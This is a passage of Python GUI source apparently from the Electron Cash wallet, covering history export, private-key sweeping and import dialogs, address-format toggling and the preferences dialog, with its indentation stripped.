with open(fileName, 'w+', encoding='utf-8') as f: # always ensure UTF-8. See issue #1453.
json.dump(labels, f, indent=4, sort_keys=True)
self.show_message(_("Your labels were exported to") + " '%s'" % str(fileName))
except (IOError, os.error) as reason:
self.show_critical(_("Electron Cash was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self.top_level_window(), _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electron-cash-history.csv')
select_msg = _('Select file to export your wallet transactions to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
res = d.exec_()
d.setParent(None) # for python GC
if not res:
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_history(self.wallet, filename, csv_button.isChecked())
except (IOError, os.error) as reason:
export_error_label = _("Electron Cash was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
return
self.show_message(_("Your wallet history has been successfully exported."))
def plot_history_dialog(self):
if plot_history is None:
return
wallet = self.wallet
history = wallet.get_history()
if len(history) > 0:
plt = plot_history(self.wallet, history)
plt.show()
def do_export_history(self, wallet, fileName, is_csv):
history = wallet.export_history(fx=self.fx)
ccy = (self.fx and self.fx.get_currency()) or ''
has_fiat_columns = history and self.fx and self.fx.show_history() and 'fiat_value' in history[0] and 'fiat_balance' in history[0]
lines = []
for item in history:
if is_csv:
cols = [item['txid'], item.get('label', ''), item['confirmations'], item['value'], item['date']]
if has_fiat_columns:
cols += [item['fiat_value'], item['fiat_balance']]
lines.append(cols)
else:
if has_fiat_columns and ccy:
item['fiat_currency'] = ccy # add the currency to each entry in the json. this wastes space but json is bloated anyway so this won't hurt too much, we hope
elif not has_fiat_columns:
# No need to include these fields as they will always be 'No Data'
item.pop('fiat_value', None)
item.pop('fiat_balance', None)
lines.append(item)
with open(fileName, "w+", encoding="utf-8") as f: # ensure encoding to utf-8. Avoid Windows cp1252. See #1453.
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
cols = ["transaction_hash","label", "confirmations", "value", "timestamp"]
if has_fiat_columns:
cols += [f"fiat_value_{ccy}", f"fiat_balance_{ccy}"] # in CSV mode, we use column names eg fiat_value_USD, etc
transaction.writerow(cols)
for line in lines:
transaction.writerow(line)
else:
f.write(json.dumps(lines, indent=4))
def sweep_key_dialog(self):
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
if not addresses:
self.show_warning(_('Wallet has no address to sweep to'))
return
d = WindowModalDialog(self.top_level_window(), title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
bip38_warn_label = QLabel(_("<b>BIP38 support is disabled because a requisite library is not installed.</b> Please install 'cryptodomex' or omit BIP38 private keys (private keys starting in 6P...). Decrypt keys to WIF format (starting with 5, K, or L) in order to sweep."))
bip38_warn_label.setWordWrap(True)
bip38_warn_label.setHidden(True)
vbox.addWidget(bip38_warn_label)
extra = ""
if bitcoin.is_bip38_available():
extra += " " + _('or BIP38 keys')
vbox.addWidget(QLabel(_("Enter private keys") + extra + " :"))
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
h, addr_combo = address_combo(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
sweep_button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), sweep_button))
def get_address_text():
return addr_combo.currentText()
def get_priv_keys():
return keystore.get_private_keys(keys_e.toPlainText(), allow_bip38=True)
def has_bip38_keys_but_no_bip38():
if bitcoin.is_bip38_available():
return False
keys = [k for k in keys_e.toPlainText().split() if k]
return any(bitcoin.is_bip38_key(k) for k in keys)
def enable_sweep():
bad_bip38 = has_bip38_keys_but_no_bip38()
sweepok = bool(get_address_text() and not bad_bip38 and get_priv_keys())
sweep_button.setEnabled(sweepok)
bip38_warn_label.setHidden(not bad_bip38)
keys_e.textChanged.connect(enable_sweep)
enable_sweep()
res = d.exec_()
d.setParent(None)
if not res:
return
try:
self.do_clear()
keys = get_priv_keys()
bip38s = {}
for i, k in enumerate(keys):
if bitcoin.is_bip38_key(k):
bip38s[k] = i
if bip38s:
# For all the BIP38s detected, prompt for password
from .bip38_importer import Bip38Importer
d2 = Bip38Importer(bip38s.keys(), parent=self.top_level_window())
d2.exec_()
d2.setParent(None)
if d2.decoded_keys:
for k,tup in d2.decoded_keys.items():
wif, adr = tup
# rewrite the keys they specified with the decrypted WIF in the keys list for sweep_preparations to work below...
i = bip38s[k]
keys[i] = wif
else:
self.show_message(_("User cancelled"))
return
coins, keypairs = sweep_preparations(keys, self.network)
self.tx_external_keypairs = keypairs
self.payto_e.setText(get_address_text())
self.spend_coins(coins)
self.spend_max()
except BaseException as e:
self.show_message(str(e))
return
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, msg, func):
text = text_dialog(self.top_level_window(), title, msg + ' :', _('Import'),
allow_multi=True)
if not text:
return
bad, bad_info = [], []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
bad_info.append("{}: {}".format(key, str(e)))
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_warning(_("The following could not be imported") + ':\n' + '\n'.join(bad), detail_text='\n\n'.join(bad_info))
self.address_list.update()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
def import_addr(addr):
if self.wallet.import_address(Address.from_string(addr)):
return addr
return ''
self._do_import(title, msg, import_addr)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
if bitcoin.is_bip38_available():
msg += " " + _('or BIP38 keys')
def func(key):
if bitcoin.is_bip38_available() and bitcoin.is_bip38_key(key):
from .bip38_importer import Bip38Importer
d = Bip38Importer([key], parent=self.top_level_window(),
message = _('A BIP38 key was specified, please enter a password to decrypt it'),
show_count = False)
d.exec_()
d.setParent(None) # python GC quicker if this happens
if d.decoded_keys:
wif, adr = d.decoded_keys[key]
return self.wallet.import_private_key(wif, password)
else:
raise util.UserCancelled()
else:
return self.wallet.import_private_key(key, password)
self._do_import(title, msg, func)
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
if not self.amount_e.isVisible():
self.fiat_send_e.setVisible(False)
else:
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def cashaddr_icon(self):
if self.config.get('addr_format', 0) == 1:
return QIcon(":icons/tab_converter.svg")
elif self.config.get('addr_format', 0)==2:
return QIcon(":icons/tab_converter_slp.svg")
else:
return QIcon(":icons/tab_converter_bw.svg")
def update_cashaddr_icon(self):
self.addr_converter_button.setIcon(self.cashaddr_icon())
def toggle_cashaddr_status_bar(self):
self.toggle_cashaddr(self.config.get('addr_format', 2))
def toggle_cashaddr_settings(self,state):
self.toggle_cashaddr(state, True)
def toggle_cashaddr(self, format, specified = False):
#Gui toggle should just increment, if "specified" is True it is being set from preferences, so leave the value as is.
if specified==False:
if self.is_slp_wallet:
max_format=2
else:
max_format=1
format+=1
if format > max_format:
format=0
self.config.set_key('addr_format', format)
Address.show_cashaddr(format)
self.setAddrFormatText(format)
for window in self.gui_object.windows:
window.cashaddr_toggled_signal.emit()
def setAddrFormatText(self, format):
try:
if format == 0:
self.addr_format_label.setText("Addr Format: Legacy")
elif format == 1:
self.addr_format_label.setText("Addr Format: Cash")
else:
self.addr_format_label.setText("Addr Format: SLP")
except AttributeError:
pass
def settings_dialog(self):
class SettingsModalDialog(WindowModalDialog):
shown_signal = pyqtSignal()
def showEvent(self, e):
super().showEvent(e)
self.shown_signal.emit()
self.need_restart = False
dialog_finished = False
d = SettingsModalDialog(self.top_level_window(), _('Preferences'))
d.setObjectName('WindowModalDialog - Preferences')
destroyed_print_error(d)
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
global_tx_widgets, per_wallet_tx_widgets = [], []
id_widgets = []
addr_format_choices = ["Legacy Format","CashAddr Format","SLP Format"]
addr_format_dict={'Legacy Format':0,'CashAddr Format':1,'SLP Format':2}
msg = _('Choose which format the wallet displays for Bitcoin Cash addresses')
addr_format_label = HelpLabel(_('Address Format') + ':', msg)
addr_format_combo = QComboBox()
addr_format_combo.addItems(addr_format_choices)
addr_format_combo.setCurrentIndex(self.config.get("addr_format", 0))
addr_format_combo.currentIndexChanged.connect(self.toggle_cashaddr_settings)
gui_widgets.append((addr_format_label,addr_format_combo))
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electroncash.i18n import languages, get_system_language_match, match_language
language_names = []
language_keys = []
for (lang_code, lang_def) in languages.items():
language_keys.append(lang_code)
lang_name = []
lang_name.append(lang_def.name)
if lang_code == '':
# System entry in languages list (==''), gets system setting
sys_lang = get_system_language_match()
if sys_lang:
lang_name.append(f' [{languages[sys_lang].name}]')
language_names.append(''.join(lang_name))
lang_combo.addItems(language_names)
conf_lang = self.config.get("language", '')
if conf_lang:
# The below code allows us to rename languages in saved config and
# have them still line up with languages in our languages dict.
# For example we used to save English as en_UK but now it's en_US
# and it will still match
conf_lang = match_language(conf_lang)
try: index = language_keys.index(conf_lang)
except ValueError: index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]:
w.setEnabled(False)
def on_lang(x):
lang_request = language_keys[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.update_tabs()
self.update_status()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
def on_customfee(x):
amt = customfee_e.get_amount()
m = int(amt * 1000.0) if amt is not None else None
self.config.set_key('customfee', m)
self.fee_slider.update()
if self.fee_custom_lbl.text() == '':
self.fee_slider_mogrifier(self.get_custom_fee_text())
else:
self.fee_slider_mogrifier()
customfee_e = BTCSatsByteEdit()
customfee_e.setAmount(self.config.custom_fee_rate() / 1000.0 if self.config.has_custom_fee_rate() else None)
customfee_e.textChanged.connect(on_customfee)
customfee_label = HelpLabel(_('Custom fee rate:'), _('Custom Fee Rate in Satoshis per byte'))
fee_widgets.append((customfee_label, customfee_e))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_e.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link/']) + '\n\n'\
+ _('For more information, see http://openalias.org')
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = util.base_unit_labels # ( 'BCH', 'mBCH', 'bits' )
msg = _('Base unit of your wallet.')\
+ '\n1 BCH = 1,000 mBCH = 1,000,000 bits.\n' \
+ _(' These settings affects the fields in the Send tab')+' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
dp = util.base_units.get(unit_result)
if dp is not None:
self.decimal_point = dp
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_tabs()
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = web.BE_sorted_list()
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online block explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(web.BE_from_config(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
qr_combo = QComboBox()
qr_label = HelpLabel(_('Video device'), '')
qr_did_scan = False
def set_no_camera(e=''):
# Older Qt or missing libs -- disable GUI control and inform user why
qr_combo.setEnabled(False)
qr_combo.clear()
qr_combo.addItem(_("Default"), "default")
qr_combo.setToolTip(_("Unable to probe for cameras on this system. QtMultimedia is likely missing."))
qr_label.setText(_('Video device') + ' ' + _('(disabled)') + ':')
qr_label.help_text = qr_combo.toolTip() + "\n\n" + str(e)
qr_label.setToolTip(qr_combo.toolTip())
def scan_cameras():
nonlocal qr_did_scan
if qr_did_scan or dialog_finished: # dialog_finished guard needed because QueuedConnection
# already scanned or dialog finished quickly
return
qr_did_scan = True
system_cameras = []
try:
from PyQt5.QtMultimedia import QCameraInfo
except ImportError as e:
set_no_camera(e)
return
system_cameras = QCameraInfo.availableCameras()
qr_combo.clear()
qr_combo.addItem(_("Default"), "default")
qr_label.setText(_('Video device') + ':')
qr_label.help_text = _("For scanning QR codes.")
qr_combo.setToolTip(qr_label.help_text)
qr_label.setToolTip(qr_label.help_text)
for cam in system_cameras:
qr_combo.addItem(cam.description(), cam.deviceName())
video_device = self.config.get("video_device")
video_device_index = 0
if video_device:
video_device_index = max(0, qr_combo.findData(video_device)) # if not found, default to 0 (the default item)
qr_combo.setCurrentIndex(video_device_index)
qr_combo.setEnabled(True)
def on_video_device(x):
if qr_combo.isEnabled():
self.config.set_key("video_device", qr_combo.itemData(x), True)
set_no_camera() # pre-populate combo box with default so it has a sizeHint
d.shown_signal.connect(scan_cameras, Qt.QueuedConnection) # do the camera scan once dialog is shown, using QueuedConnection so it's called from top level event loop and not from the showEvent handler
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Default'), 'default') # We can't name this "light" in the UI as sometimes the default is actually dark-looking eg on Mojave or on some Linux desktops.
colortheme_combo.addItem(_('Dark'), 'dark')
theme_name = self.config.get('qt_gui_color_theme', 'default')
dark_theme_available = self.gui_object.is_dark_theme_available()
if theme_name == 'dark' and not dark_theme_available:
theme_name = 'default'
index = colortheme_combo.findData(theme_name)
if index < 0: index = 0
colortheme_combo.setCurrentIndex(index)
msg = ( _("Dark theme support requires the package 'QDarkStyle' (typically installed via the 'pip3' command on Unix & macOS).")
if not dark_theme_available
else '' )
lbltxt = _('Color theme') + ':'
colortheme_label = HelpLabel(lbltxt, msg) if msg else QLabel(lbltxt)
def on_colortheme(x):
item_data = colortheme_combo.itemData(x)
if not dark_theme_available and item_data == 'dark':
self.show_error(_("Dark theme is not available. Please install QDarkStyle to access this feature."))
colortheme_combo.setCurrentIndex(0)
return
self.config.set_key('qt_gui_color_theme', item_data, True)
if theme_name != item_data:
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
if sys.platform not in ('darwin',):
# Enable/Disable HighDPI -- this option makes no sense for macOS
# and thus does not appear on that platform
hidpi_chk = QCheckBox(_('Automatic high-DPI scaling'))
if sys.platform in ('linux',):
hidpi_chk.setToolTip(_("Enable/disable this option if you experience graphical glitches (such as overly large status bar icons)"))
else: # windows
hidpi_chk.setToolTip(_("Enable/disable this option if you experience graphical glitches (such as dialog box text being cut off"))
hidpi_chk.setChecked(bool(self.config.get('qt_enable_highdpi', True)))
if self.config.get('qt_disable_highdpi'):
hidpi_chk.setToolTip(_('Automatic high DPI scaling was disabled from the command-line'))
hidpi_chk.setChecked(False)
hidpi_chk.setDisabled(True)
def on_hi_dpi_toggle():
self.config.set_key('qt_enable_highdpi', hidpi_chk.isChecked())
self.need_restart = True
hidpi_chk.stateChanged.connect(on_hi_dpi_toggle)
gui_widgets.append((hidpi_chk, None))
if sys.platform in ('win32', 'cygwin'):
# Enable/Disable the use of the FreeType library on Qt
# (Windows only)
freetype_chk = QCheckBox(_('Use FreeType for font rendering'))
freetype_chk.setChecked(self.gui_object.windows_qt_use_freetype)
freetype_chk.setEnabled(self.config.is_modifiable('windows_qt_use_freetype'))
freetype_chk.setToolTip(_("Enable/disable this option if you experience font rendering glitches (such as blurred text or monochrome emoji characters)"))
def on_freetype_chk():
self.gui_object.windows_qt_use_freetype = freetype_chk.isChecked() # property has a method backing it
self.need_restart = True
freetype_chk.stateChanged.connect(on_freetype_chk)
gui_widgets.append((freetype_chk, None))
elif sys.platform in ('linux',):
# Enable/Disable the use of the fonts.xml FontConfig override
# (Linux only)
fontconfig_chk = QCheckBox(_('Use custom fontconfig for emojis'))
fontconfig_chk.setChecked(self.gui_object.linux_qt_use_custom_fontconfig)
fontconfig_chk.setEnabled(self.config.is_modifiable('linux_qt_use_custom_fontconfig'))
fontconfig_chk.setToolTip(_("Enable/disable this option if you experience font rendering glitches (such as blurred text or monochrome emoji characters)"))
def on_fontconfig_chk():
self.gui_object.linux_qt_use_custom_fontconfig = fontconfig_chk.isChecked() # property has a method backing it
self.need_restart = True
fontconfig_chk.stateChanged.connect(on_fontconfig_chk)
gui_widgets.append((fontconfig_chk, None))
gui_widgets.append((None, None)) # spacer
updatecheck_cb = QCheckBox(_("Automatically check for updates"))
updatecheck_cb.setChecked(self.gui_object.has_auto_update_check())
updatecheck_cb.setToolTip(_("Enable this option if you wish to be notified as soon as a new version of Electron Cash becomes available"))
def on_set_updatecheck(v):
self.gui_object.set_auto_update_check(v == Qt.Checked)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
notify_tx_cb = QCheckBox(_('Notify when receiving funds'))
notify_tx_cb.setToolTip(_('If enabled, a system notification will be presented when you receive funds to this wallet.'))
notify_tx_cb.setChecked(bool(self.wallet.storage.get('gui_notify_tx', True)))
def on_notify_tx(b):
self.wallet.storage.put('gui_notify_tx', bool(b))
notify_tx_cb.stateChanged.connect(on_notify_tx)
per_wallet_tx_widgets.append((notify_tx_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
if self.force_use_single_change_addr:
usechange_cb.setChecked(True)
usechange_cb.setEnabled(False)
if isinstance(self.force_use_single_change_addr, str):
usechange_cb.setToolTip(self.force_use_single_change_addr)
else:
usechange_cb.setChecked(self.wallet.use_change)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
per_wallet_tx_widgets.append((usechange_cb, None))
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
if self.force_use_single_change_addr:
multiple_cb.setEnabled(False)
multiple_cb.setChecked(False)
if isinstance(self.force_use_single_change_addr, str):
multiple_cb.setToolTip(self.force_use_single_change_addr)
else:
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_cb.stateChanged.connect(on_multiple)
per_wallet_tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
global_tx_widgets.append((unconf_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
enable_opreturn = bool(self.config.get('enable_opreturn'))
opret_cb = QCheckBox(_('Enable OP_RETURN output'))
opret_cb.setToolTip(_('Enable posting messages with OP_RETURN.'))
opret_cb.setChecked(enable_opreturn)
opret_cb.stateChanged.connect(self.on_toggled_opreturn)
global_tx_widgets.append((opret_cb,None))
# Schnorr
use_schnorr_cb = QCheckBox(_("Sign with Schnorr signatures"))
use_schnorr_cb.setChecked(self.wallet.is_schnorr_enabled())
use_schnorr_cb.stateChanged.connect(self.wallet.set_schnorr_enabled)
no_schnorr_reason = []
if self.wallet.is_schnorr_possible(no_schnorr_reason):
use_schnorr_cb.setEnabled(True)
use_schnorr_cb.setToolTip(_("Sign all transactions using Schnorr signatures."))
else:
# not possible (wallet type not supported); show reason in tooltip
use_schnorr_cb.setEnabled(False)
use_schnorr_cb.setToolTip(no_schnorr_reason[0])
per_wallet_tx_widgets.append((use_schnorr_cb, None))
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([pgettext('Referencing Fiat currency', 'None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
c = self.fx.get_currency()
h = self.fx.get_history_config()
else:
c, h = self.fx.default_currency, False
exchanges = self.fx.get_exchanges_by_ccy(c, h)
conf_exchange = self.fx.config_exchange()
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
idx = ex_combo.findText(conf_exchange) # try and restore previous exchange if in new list
if idx < 0:
# hmm, previous exchange wasn't in new h= setting. Try default exchange.
idx = ex_combo.findText(self.fx.default_exchange)
idx = 0 if idx < 0 else idx # if still no success (idx < 0) -> default to the first exchange in combo
if exchanges: # don't set index if no exchanges, as any index is illegal. this shouldn't happen.
ex_combo.setCurrentIndex(idx) # note this will emit a currentIndexChanged signal if it's changed
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
changed = bool(self.fx.get_history_config()) != bool(checked)
self.fx.set_history_config(checked)
update_exchanges()
self.history_list.refresh_headers()
self.slp_history_list.refresh_headers()
if self.fx.is_enabled() and checked:
# reset timeout to get historical rates
self.fx.timeout = 0
if changed:
self.history_list.update() # this won't happen too often as it's rate-limited
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
hist_checkbox.setText(_('Show history rates'))
fiat_address_checkbox.setText(_('Show fiat balance for addresses'))
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency:')), ccy_combo))
fiat_widgets.append((QLabel(_('Source:')), ex_combo))
fiat_widgets.append((hist_checkbox, None))
fiat_widgets.append((fiat_address_checkbox, None))
tabs_info = [
(gui_widgets, _('General')),
(fee_widgets, _('Fees')),
(OrderedDict([
( _("App-Global Options") , global_tx_widgets ),
( _("Per-Wallet Options") , per_wallet_tx_widgets),
]), _('Transactions')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
def add_tabs_info_to_tabs(tabs, tabs_info):
def add_widget_pair(a,b,grid):
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
if a:
grid.addWidget(a, i, 0, 1, 2)
else:
grid.addItem(QSpacerItem(15, 15), i, 0, 1, 2)
for thing, name in tabs_info:
tab = QWidget()
if isinstance(thing, dict):
# This Prefs tab is laid out as groupboxes one atop another...
d = thing
vbox = QVBoxLayout(tab)
for groupName, widgets in d.items():
gbox = QGroupBox(groupName)
grid = QGridLayout(gbox)
grid.setColumnStretch(0,1)
for a,b in widgets:
add_widget_pair(a,b,grid)
vbox.addWidget(gbox, len(widgets))
else:
# Standard layout.. 1 tab has just a grid of widgets
widgets = thing
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
add_widget_pair(a,b,grid)
tabs.addTab(tab, name)
# / add_tabs_info_to_tabs
add_tabs_info_to_tabs(tabs, tabs_info)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
try:
# run the dialog
d.exec_()
finally:
dialog_finished = True # paranoia for scan_cameras
d.setParent(None) # for Python GC
if self.fx:
self.fx.timeout = 0
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_message(_('Please restart Electron Cash to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice.
# clean_up() guards against that situation.
self.clean_up()
super().closeEvent(event)
event.accept() # paranoia. be sure it's always accepted.
def is_alive(self): return bool(not self.cleaned_up)
def clean_up_connections(self):
def disconnect_signals():
for attr_name in dir(self):
if attr_name.endswith("_signal"):
sig = getattr(self, attr_name)
if isinstance(sig, pyqtBoundSignal):
try: sig.disconnect()
except TypeError: pass # no connections
elif attr_name.endswith("__RateLimiter"): # <--- NB: this needs to match the attribute name in util.py rate_limited decorator
rl_obj = getattr(self, attr_name)
if isinstance(rl_obj, RateLimiter):
rl_obj.kill_timer()
try: self.disconnect()
except TypeError: pass
# Work-around to PyQt bugs. See EC issue #1532
try: self.gui_object.update_available_signal.disconnect(self.on_update_available) # shows/hides the update_available_button, emitted by update check mechanism when a new version is available
except TypeError: pass
def disconnect_network_callbacks():
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
# /
disconnect_network_callbacks()
disconnect_signals()
def clean_up_children(self):
# Status bar holds references to self, so clear it to help GC this window
self.setStatusBar(None)
# Note that due to quirks on macOS and the shared menu bar, we do *NOT*
# clear the menuBar. Instead, doing this causes the object to get
# deleted and/or its actions (and more importantly menu action hotkeys)
# to go away immediately.
self.setMenuBar(None)
# Disable shortcuts immediately to prevent them from accidentally firing
